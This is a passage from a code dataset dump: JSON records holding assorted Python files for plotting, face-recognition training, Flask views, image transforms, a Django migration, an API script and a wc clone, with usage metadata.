{"api_name": "numpy.inf", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 8, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 8, "usage_type": "attribute"}, {"api_name": "meshes.simple1", "line_number": 11, "usage_type": "name"}, {"api_name": "meshes.pacman", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "75102392", "text": "# This scripts assumes that the dataframe has been created and saved in data.txt\n\nimport pickle\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom dataFrameUtilities import selectTime, selectColumns, addRollingMeanColumns\n\ninput = open('data.txt', 'rb')\ndata = pickle.load(input)\ninput.close()\n\ntimeSelected = selectTime(data, '2016-09-01', '2019-03-06')\n\npain = selectColumns(timeSelected, ['kneePain'])\npain = addRollingMeanColumns(pain, ['kneePain'], 21)\n\nenv = addRollingMeanColumns(timeSelected, ['steps','denivelation'], 21)\nenvRollingMean = selectColumns(env, ['stepsRollingMean','denivelationRollingMean'])\nenvBrut = selectColumns(env, ['steps','denivelation'])\n\nfig, axes = plt.subplots(nrows=3, ncols=1)\n\npain.plot(ax=axes[0])\nenvBrut.plot(ax=axes[1])\nenvRollingMean.plot(ax=axes[2])\n\nplt.legend(loc='best')\nplt.show()\n", "sub_path": "firstExperimentsAndCode/2_analyzeDataKnee.py", "file_name": "2_analyzeDataKnee.py", "file_ext": "py", "file_size_in_byte": 854, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pickle.load", "line_number": 10, "usage_type": "call"}, {"api_name": "dataFrameUtilities.selectTime", "line_number": 13, "usage_type": "call"}, {"api_name": "dataFrameUtilities.selectColumns", "line_number": 15, "usage_type": "call"}, {"api_name": "dataFrameUtilities.addRollingMeanColumns", "line_number": 16, "usage_type": "call"}, {"api_name": "dataFrameUtilities.addRollingMeanColumns", "line_number": 18, "usage_type": "call"}, {"api_name": "dataFrameUtilities.selectColumns", "line_number": 19, "usage_type": "call"}, {"api_name": "dataFrameUtilities.selectColumns", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "310062815", "text": "\"\"\"\nThis file is used for train face dataset\n\"\"\"\n\nimport cv2,os\nimport numpy as np\nfrom PIL import Image\nimport pickle\n\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\ndetector = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n\ndef getImagesAndLabels(datasetPath):\n #get the path of all the files in the folder\n #create empth face list\n faceSamples_Train=[]\n # create empty ID list\n ids_Labels = []\n labelIds={}\n currentID = 0\n for root, dirs, files in os.walk(datasetPath):\n #now looping through all the image paths and loading the Ids and the images\n for file in files:\n imagePath = os.path.join(root, file)\n label = os.path.basename(root).replace(\" \", \"-\").lower()\n if not label in labelIds:\n labelIds[label] = currentID\n currentID+=1\n # getting the Id from the image\n Ids = labelIds[label]\n #loading the image and converting it to gray scale\n pilImage=Image.open(imagePath).convert('L')\n #Now we are converting the PIL image into numpy array\n imageNp=np.array(pilImage, 'uint8')\n # extract the face from the training image sample\n faces=detector.detectMultiScale(imageNp)\n #If a face is there then append that in the list as well as Id of it\n for (x,y,w,h) in faces:\n faceSamples_Train.append(imageNp[y:y + h, x:x + w])\n ids_Labels.append(Ids)\n with open(\"labels.pickle\",\"wb\") as f:\n pickle.dump(labelIds,f)\n return faceSamples_Train, ids_Labels\n\n\nfaceSamples_Train, ids_Labels = getImagesAndLabels('dataSets')\nrecognizer.train(faceSamples_Train, np.array(ids_Labels))\nrecognizer.save('trainner.yml')\n\n\n\n\n", "sub_path": "trainer.py", "file_name": "trainer.py", "file_ext": "py", "file_size_in_byte": 1786, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "cv2.face.LBPHFaceRecognizer_create", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.face", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.CascadeClassifier", "line_number": 11, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 32, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 32, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "560335793", "text": "import matplotlib.pyplot as plt\n\nfrom Random_Walk_Class import RandomWalk\n\n# 只要程序处于活动状态,就不断地模拟随机漫步\nwhile True:\n rw = RandomWalk() # 创建一个 RandomWalk实例\n rw.fill_walk() # 执行漫步操作\n\n # 将所有的点都绘制出来\n plt.style.use('seaborn-darkgrid')\n fig, ax = plt.subplots()\n point_numbers = range(rw.num_points)\n ax.scatter(rw.x_values, rw.y_values, c=list(point_numbers), cmap=plt.cm.viridis, edgecolors='none' ,s=5)\n plt.show()\n\n keep_running = input(\"Make another walk? (y/n): \")\n if keep_running == 'n' or keep_running == 'N':\n print(\"Random walk has been terminated.\")\n break\n elif keep_running == 'y' or keep_running == 'Y':\n print(\"Processing...\")\n continue\n else:\n print(\"Input Error!\")\n break\n# end\n", "sub_path": "Random_Walk/Random_Walk_2.py", "file_name": "Random_Walk_2.py", "file_ext": "py", "file_size_in_byte": 856, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "Random_Walk_Class.RandomWalk", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 11, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 14, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "485018876", "text": "import logging\r\nfrom google.datacatalog_connectors.mysql_.lineage_extractor \\\r\n import logs_reader, asset_level_lineage_extractor\r\nfrom google.datacatalog_connectors.mysql_.parse.parse_sql import MySqlParser\r\n\r\n\r\nclass AssetLevelLinneagScraper():\r\n\r\n def __init__(self, connection):\r\n self.connection = connection\r\n\r\n def scrape(self):\r\n # read logs\r\n reader = self._get_log_reader()(self.connection)\r\n logs = reader.read_logs()\r\n\r\n # extract lineage\r\n lineageList = []\r\n lineage_extractor = self._get_lineage_extractor()()\r\n\r\n for log in logs:\r\n if log['command_type'] == 'Query':\r\n query = log['argument'].decode('ascii')\r\n if lineage_extractor.query_has_lineage(query):\r\n try:\r\n log = f'Parsing Query: {query}\\n'\r\n parse_tree = self._get_sql_parser()().parse_query(\r\n query)\r\n log += '---------------- Parse Tree ----------------\\n'\r\n log += str(parse_tree) + '\\n'\r\n log += '----------------- lineage -----------------\\n'\r\n lineage = lineage_extractor \\\r\n .extract_asset_lineage_from_parsed_tree(parse_tree)\r\n log += str(lineage) + '\\n'\r\n lineageList.extend(lineage)\r\n logging.info(log)\r\n except Exception as e:\r\n logging.error(\"Parse error: Couldn't parse: \" + query)\r\n print(e)\r\n\r\n else:\r\n logging.info(\"Query has no lineage (Skipped): \" + query)\r\n\r\n # return lineage info\r\n return lineageList\r\n\r\n def _get_log_reader(self):\r\n return logs_reader.LogsReader\r\n\r\n def _get_sql_parser(self):\r\n return MySqlParser\r\n\r\n def _get_lineage_extractor(self):\r\n return asset_level_lineage_extractor.AssetLevelLineageExtractor\r\n", "sub_path": "google-datacatalog-mysql-lineage-extractor/src/google/datacatalog_connectors/mysql_/lineage_extractor/asset_level_lineage_scraper.py", "file_name": "asset_level_lineage_scraper.py", "file_ext": "py", "file_size_in_byte": 2049, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.info", "line_number": 36, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "google.datacatalog_connectors.mysql_.lineage_extractor.logs_reader.LogsReader", "line_number": 48, "usage_type": "attribute"}, {"api_name": "google.datacatalog_connectors.mysql_.lineage_extractor.logs_reader", "line_number": 48, "usage_type": "name"}, {"api_name": "google.datacatalog_connectors.mysql_.parse.parse_sql.MySqlParser", "line_number": 51, "usage_type": "name"}, {"api_name": "google.datacatalog_connectors.mysql_.lineage_extractor.asset_level_lineage_extractor.AssetLevelLineageExtractor", "line_number": 54, "usage_type": "attribute"}, {"api_name": "google.datacatalog_connectors.mysql_.lineage_extractor.asset_level_lineage_extractor", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "374246745", "text": "from flask import Flask, request, render_template\nfrom app.libs.api import CachedApi\nfrom app.models import Pagination\n\napp = Flask(__name__)\n\nPRODUCTS_PER_CATEGORY_PAGE = 5\nCATEGORY_PER_HOMEPAGE = 9\nPRODUCT_SHORT_DESCRIPTION_LENGTH = 250\n\n\nPAGE_404_TEXTS = {\n 'title': 'Ooops, něco není dobře',\n 'text': 'Zdá se, že hledáte stranku, která tu není',\n 'suggestion': 'Zkusme začít od začátku',\n 'button_text': 'Na začátek'\n}\n\nPAGE_500_TEXTS = {\n 'title': 'Ooops, zdá se, že se něco pokazilo',\n 'text': 'Slibujeme, že se to stává maximálně jednou za deset let!',\n 'suggestion': 'Zkuste akci opakovat',\n 'button_text': 'Opakovat'\n}\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('oops.html', url='/', **PAGE_404_TEXTS), 404\n\n\n@app.errorhandler(500)\ndef internal_server_error(e):\n return render_template('oops.html', url=request.url, **PAGE_500_TEXTS), 500\n\n\n@app.route('/')\ndef homepage():\n page_number = request.args.get('page', default=1, type=int)\n\n api = CachedApi()\n all_categories = api.fetch_all_categories()\n pagination = Pagination(len(all_categories.categories), CATEGORY_PER_HOMEPAGE, page_number)\n\n offset = (pagination.current_page - 1) * CATEGORY_PER_HOMEPAGE\n limit = CATEGORY_PER_HOMEPAGE\n\n categories = all_categories.categories[offset:offset + limit + 1]\n\n return render_template('categories.html',\n all_categories=all_categories,\n categories=categories,\n pagination=pagination)\n\n\n@app.route('/categories/')\ndef category_page(category_id):\n page_number = request.args.get('page', default=1, type=int)\n\n api = CachedApi()\n all_categories = api.fetch_all_categories()\n\n product_count = api.fetch_product_count(category_id)\n pagination = Pagination(product_count, PRODUCTS_PER_CATEGORY_PAGE, page_number)\n\n products = api.fetch_products(category_id,\n offset=(pagination.current_page - 1) * PRODUCTS_PER_CATEGORY_PAGE,\n limit=PRODUCTS_PER_CATEGORY_PAGE)\n\n category = api.fetch_category(category_id)\n\n return render_template('category.html',\n all_categories=all_categories,\n category=category,\n product_short_description_length=PRODUCT_SHORT_DESCRIPTION_LENGTH,\n products=products,\n pagination=pagination)\n\n\n@app.route('/products/')\ndef product_page(product_id):\n api = CachedApi()\n product = api.fetch_product(product_id)\n category = api.fetch_category(product.category_id)\n\n return render_template('product.html',\n product=product,\n category=category,\n product_short_description_length=PRODUCT_SHORT_DESCRIPTION_LENGTH)\n", "sub_path": "app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2945, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "app.libs.api", "line_number": 5, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 29, "usage_type": "call"}, {"api_name": "app.libs.api.errorhandler", "line_number": 27, "usage_type": "call"}, {"api_name": "app.libs.api", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.url", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "app.libs.api.errorhandler", "line_number": 32, "usage_type": "call"}, {"api_name": "app.libs.api", "line_number": 32, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "app.libs.api.CachedApi", "line_number": 41, "usage_type": "call"}, {"api_name": "app.models.Pagination", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 50, "usage_type": "call"}, {"api_name": "app.libs.api.route", "line_number": 37, "usage_type": "call"}, {"api_name": "app.libs.api", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "app.libs.api.CachedApi", "line_number": 60, "usage_type": "call"}, {"api_name": "app.models.Pagination", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 72, "usage_type": "call"}, {"api_name": "app.libs.api.route", "line_number": 56, "usage_type": "call"}, {"api_name": "app.libs.api", "line_number": 56, "usage_type": "name"}, {"api_name": "app.libs.api.CachedApi", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 86, "usage_type": "call"}, {"api_name": "app.libs.api.route", "line_number": 80, "usage_type": "call"}, {"api_name": "app.libs.api", "line_number": 80, "usage_type": "name"}]} +{"seq_id": "211336104", "text": "import cv2\n\nfrom src.utils.transform import change_transform_origin\n\n\ndef adjust_transform_for_image(transform, image, relative_translation):\n \"\"\" Adjust a transformation for a specific image.\n\n The translation of the matrix will be scaled with the size of the image.\n The linear part of the transformation will adjusted so that the origin of the transformation will be at the center of the image.\n \"\"\"\n height, width, channels = image.shape\n\n result = transform\n\n # Scale the translation with the image size if specified.\n if relative_translation:\n result[0:2, 2] *= [width, height]\n\n # Move the origin of transformation.\n result = change_transform_origin(transform, (0.5 * width, 0.5 * height))\n\n return result\n\n\nclass TransformParameters:\n \"\"\" Struct holding parameters determining how to apply a transformation to an image.\n\n Args\n fill_mode: One of: 'constant', 'nearest', 'reflect', 'wrap'\n interpolation: One of: 'nearest', 'linear', 'cubic', 'area', 'lanczos4'\n cval: Fill value to use with fill_mode='constant'\n relative_translation: If true (the default), interpret translation as a factor of the image size.\n If false, interpret it as absolute pixels.\n \"\"\"\n\n def __init__(\n self,\n fill_mode='nearest',\n interpolation='linear',\n cval=0,\n relative_translation=True,\n ):\n self.fill_mode = fill_mode\n self.cval = cval\n self.interpolation = interpolation\n self.relative_translation = relative_translation\n\n def cvBorderMode(self):\n if self.fill_mode == 'constant':\n return cv2.BORDER_CONSTANT\n if self.fill_mode == 'nearest':\n return cv2.BORDER_REPLICATE\n if self.fill_mode == 'reflect':\n return cv2.BORDER_REFLECT_101\n if self.fill_mode == 'wrap':\n return cv2.BORDER_WRAP\n\n def cvInterpolation(self):\n if self.interpolation == 'nearest':\n return cv2.INTER_NEAREST\n if self.interpolation == 'linear':\n return cv2.INTER_LINEAR\n if self.interpolation == 'cubic':\n return cv2.INTER_CUBIC\n if self.interpolation == 'area':\n return cv2.INTER_AREA\n if self.interpolation == 'lanczos4':\n return cv2.INTER_LANCZOS4\n\n\ndef apply_transform(matrix, image, params):\n \"\"\"\n Apply a transformation to an image.\n\n The origin of transformation is at the top left corner of the image.\n\n The matrix is interpreted such that a point (x, y) on the original image is moved to transform * (x, y) in the generated image.\n Mathematically speaking, that means that the matrix is a transformation from the transformed image space to the original image space.\n\n Args\n matrix: A homogeneous 3 by 3 matrix holding representing the transformation to apply.\n image: The image to transform.\n params: The transform parameters (see TransformParameters)\n \"\"\"\n output = cv2.warpAffine(\n image,\n matrix[:2, :],\n dsize=(image.shape[1], image.shape[0]),\n flags=params.cvInterpolation(),\n borderMode=params.cvBorderMode(),\n borderValue=params.cval,\n )\n return output\n\n\ndef compute_resize_scale(image_shape, min_side=720, max_side=1280):\n \"\"\" Compute an image scale such that the image size is constrained to min_side and max_side.\n\n Args\n min_side: The image's min side will be equal to min_side after resizing.\n max_side: If after resizing the image's max side is above max_side, resize until the max side is equal to max_side.\n\n Returns\n A resizing scale.\n \"\"\"\n (rows, cols, _) = image_shape\n\n smallest_side = min(rows, cols)\n\n # rescale the image so the smallest side is min_side\n scale = min_side / smallest_side\n\n # check if the largest side is now greater than max_side, which can happen\n # when images have a large aspect ratio\n largest_side = max(rows, cols)\n if largest_side * scale > max_side:\n scale = max_side / largest_side\n\n return scale\n\n\ndef resize_image(img, min_side=720, max_side=1280):\n \"\"\" Resize an image such that the size is constrained to min_side and max_side.\n\n Args\n min_side: The image's min side will be equal to min_side after resizing.\n max_side: If after resizing the image's max side is above max_side, resize until the max side is equal to max_side.\n\n Returns\n A resized image.\n \"\"\"\n # compute scale to resize the image\n scale = compute_resize_scale(img.shape, min_side=min_side, max_side=max_side)\n\n # resize the image with the computed scale\n img = cv2.resize(img, None, fx=scale, fy=scale)\n\n return img, scale\n", "sub_path": "src/utils/image.py", "file_name": "image.py", "file_ext": "py", "file_size_in_byte": 4817, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "src.utils.transform.change_transform_origin", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.BORDER_CONSTANT", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cv2.BORDER_REPLICATE", "line_number": 53, "usage_type": "attribute"}, {"api_name": "cv2.BORDER_REFLECT_101", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cv2.BORDER_WRAP", "line_number": 57, "usage_type": "attribute"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 61, "usage_type": "attribute"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 63, "usage_type": "attribute"}, {"api_name": "cv2.INTER_CUBIC", "line_number": 65, "usage_type": "attribute"}, {"api_name": "cv2.INTER_AREA", "line_number": 67, "usage_type": "attribute"}, {"api_name": "cv2.INTER_LANCZOS4", "line_number": 69, "usage_type": "attribute"}, {"api_name": "cv2.warpAffine", "line_number": 86, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 137, "usage_type": "call"}]} +{"seq_id": "210011562", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport uuid\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('website', '0028_auto_20151124_1336'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='comment',\n name='id',\n field=models.UUIDField(default=uuid.uuid4, serialize=False, editable=False, primary_key=True),\n ),\n migrations.AlterField(\n model_name='comment',\n name='linked_comment',\n field=models.ForeignKey(blank=True, to='website.Comment', null=True),\n ),\n ]\n", "sub_path": "website/migrations/0029_auto_20151124_1353.py", "file_name": "0029_auto_20151124_1353.py", "file_ext": "py", "file_size_in_byte": 660, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 8, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.UUIDField", "line_number": 18, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.db.migrations.AlterField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 20, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "485323059", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 11 20:41:57 2018\n\n@author: brucelau\n\"\"\"\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nmatplotlib.rcParams['font.sans-serif'] = ['SimHei']\nmatplotlib.rcParams['axes.unicode_minus'] = False\ndef tanh(x):\n return (np.exp(x)-np.exp(-x))/(np.exp(x)+np.exp(-x))\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\ndef relu(x):\n return np.array([0*item if item<0 else item for item in x ])\n\nx = np.linspace(-10,10,1000)\ny_sigmoid = 1/(1+np.exp(-x))\ny_tanh = (np.exp(x)-np.exp(-x))/(np.exp(x)+np.exp(-x))\ncharactr_size=20\ncolor='red'\nrow,col=2,3\nfig = plt.figure()\n# plot sigmoid\nax = fig.add_subplot(row,col,1)\nax.plot(x,y_sigmoid,color=color)\nax.grid()\nax.set_title('(a) Sigmoid ',fontsize=charactr_size)\n\nax = fig.add_subplot(row,col,1+3)\nax.plot(x,sigmoid(x)*(1-sigmoid(x)),label='hello',color=color)\nax.grid()\nax.set_title('(d) Sigmoid 导数',fontsize=charactr_size)\n\n# plot tanh\nax = fig.add_subplot(row,col,2)\nax.plot(x,y_tanh,color=color)\nax.grid()\nax.set_title('(b) Tanh',fontsize=charactr_size)\n\nax = fig.add_subplot(row,col,2+3)\nax.plot(x,1-tanh(x)**2,color=color)\nax.grid()\nax.set_title('(e) Tanh 导数',fontsize=charactr_size)\n\n# plot relu\nax = fig.add_subplot(row,col,3)\ny_relu = np.array([0*item if item<0 else item for item in x ])\nax.plot(x,y_relu,color=color)\nax.grid()\nax.set_title('(c) ReLu',fontsize=charactr_size)\n\nax = fig.add_subplot(row,col,3+3)\ny_relu = np.array([0*item if item<0 else 1 for item in x ])\nax.plot(x,y_relu,color=color)\nax.grid()\nax.set_title('(f) ReLu 导数',fontsize=charactr_size)\n\n# #plot leaky relu\n# ax = fig.add_subplot(2,4,4)\n# y_relu = np.array([0.2*item if item<0 else item for item in x ])\n# ax.plot(x,y_relu)\n# ax.grid()\n# ax.set_title('(d) Leaky ReLu')\n\nplt.tight_layout()\nplt.show()", "sub_path": "大论文代码/第四章/tensorflow学习代码/激活函数对比图.py", "file_name": "激活函数对比图.py", "file_ext": "py", "file_size_in_byte": 1807, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "matplotlib.rcParams", "line_number": 10, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "411001896", "text": "import collections\nimport os\n\nimport requests\n\n\nSERVER = os.environ['SDE_SERVER'] # e.g. https://cd.sdelements.com\nAPI_TOKEN = os.environ['SDE_API_TOKEN'] # e.g. f258c47557a3f98f55d4fbd0icb9d8354c86fbb52\n\nPROJECTS_URL = f'{SERVER}/api/v2/projects/?page_size=100'\n\nREQUESTS_HEADER = {\n 'Authorization': \"Token \" + API_TOKEN, # Authorization header + generated API TOKEN\n 'Accept': \"application/json\"\n}\n\nprint(\"Fetching projects from: {}\".format(PROJECTS_URL))\nprint(\"Using API Token: {}...\".format(API_TOKEN[:5]))\n\nprojects_url = PROJECTS_URL\nwhile True:\n response = requests.get(projects_url, headers=REQUESTS_HEADER, verify=False)\n response.raise_for_status()\n\n data = response.json()\n\n # loop over the projects to accept tasks\n for project_id, name in [(project['id'], project['name']) for project in data['results']]:\n tasks_url = f'{SERVER}/api/v2/projects/{project_id}/task-updates/'\n response = requests.get(tasks_url, headers=REQUESTS_HEADER, verify=False)\n response.raise_for_status()\n\n data = response.json()\n\n if not data[\"results\"]:\n print(f'Project {name} ({project_id}): no updates')\n else:\n added_tasks = 0\n removed_tasks = 0\n for task in data[\"results\"]:\n if task[\"accepted\"] and not task[\"relevant\"]:\n removed_tasks += 1\n elif not task[\"accepted\"] and task[\"relevant\"]:\n added_tasks += 1\n print(f'Project {name} ({project_id}): there are {added_tasks} new tasks and {removed_tasks} removed tasks')\n\n # Grab the URL of the next page of results to fetch; if this entry is\n # blank we have reached the last page\n if \"next\" in data:\n projects_url = data[\"next\"]\n else:\n break\n", "sub_path": "refresh_task_relevance.py", "file_name": "refresh_task_relevance.py", "file_ext": "py", "file_size_in_byte": 1811, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 8, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "305941013", "text": "import re\n\nfrom collections import OrderedDict\nimport numpy as np\nfrom bs4 import BeautifulSoup\n\ndef sort_dict(diction):\n \"\"\" Sorts the dict alphabetically \"\"\"\n out = OrderedDict()\n for key in sorted(diction.keys()):\n out[key] = diction[key]\n return out\n\ndef parse_res(respons):\n \"\"\" Parses response from website \"\"\"\n parsed_html = BeautifulSoup(respons, features=\"html.parser\")\n text = parsed_html.body.find('div', attrs={'class':'calculator_area'}).text\n text = re.sub(r'[\\s]+', ' ', text)\n text = re.sub(r'[^a-zA-Z\\d\\s\\,\\.]+', '', text)\n text = text.replace(\"Renten versicherung\", \"Rentenversicherung\")\n text = text.replace(\"Kranken versicherung\", \"Krankennversicherung\")\n text = text.replace(\"Pflege versicherung\", \"Pflegeversicherung\")\n text = text.replace(\"Arbeitslosen versicherung\", \"Arbeitslosenversicherung\")\n text = text.replace(\"Solidaritts zuschlag\", \"Solidaritätszuschlag\")\n\n values = {}\n cur_entity = \"\"\n list_of_entities = [\"Brutto\", \"Vorteil\", \"Solidaritätszuschlag\", \"Kirchensteuer\",\n \"Lohnsteuer\", \"Steuern\", \"Sozialabgaben\",\n \"Rentenversicherung\", \"Krankennversicherung\",\n \"Pflegeversicherung\", \"Arbeitslosenversicherung\", \"Netto\"]\n for word in text.split():\n if word in list_of_entities:\n cur_entity = word\n continue\n if cur_entity in list_of_entities:\n if cur_entity + \"_Monat\" not in values:\n values[cur_entity + '_Monat'] = np.float(word.replace(\".\", \"\").replace(\",\", \".\"))\n elif cur_entity + \"_Jahr\" not in values:\n values[cur_entity + '_Jahr'] = np.float(word.replace(\".\", \"\").replace(\",\", \".\"))\n else:\n continue\n values = sort_dict(values)\n return values\n\nif __name__ == \"__main__\":\n print(parse_res(\"abc\"))\n", "sub_path": "parse_res/parse_res.py", "file_name": "parse_res.py", "file_ext": "py", "file_size_in_byte": 1890, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "collections.OrderedDict", "line_number": 9, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 16, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 18, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "600872838", "text": "# coding:utf-8\n\n# two problems\n# python wc.py -l testinputs/test-1 -c testinputs/test-3\n# 如果输错 是否会读下一个文件 python wc.py -l testinputs/test testinputs/test-3\n\nimport argparse\nimport sys\n\nparser = argparse.ArgumentParser() # 创建一个解析对象\nparser.add_argument(\"-l\", help=\"number of lines\", action=\"store_true\")\nparser.add_argument(\"-w\", help=\"number of words\", action=\"store_true\")\nparser.add_argument(\"-c\", help=\"number of bytes\", action=\"store_true\")\nparser.add_argument(\"-m\", help=\"number of chars\", action=\"store_true\")\nparser.add_argument(\"-L\", help=\"number of bytes\", action=\"store_true\")\nparser.add_argument(\"--files0-from\",\n\t\t\t\t\thelp=\"read input from the files specified by NUL-terminated names in file\\nIf F is - then read names from standard input\",\n\t\t\t\t\tdest=\"filelist\", nargs=1)\nparser.add_argument(\"--version\", action='version', version=\"wc.py (GNU coreutils) 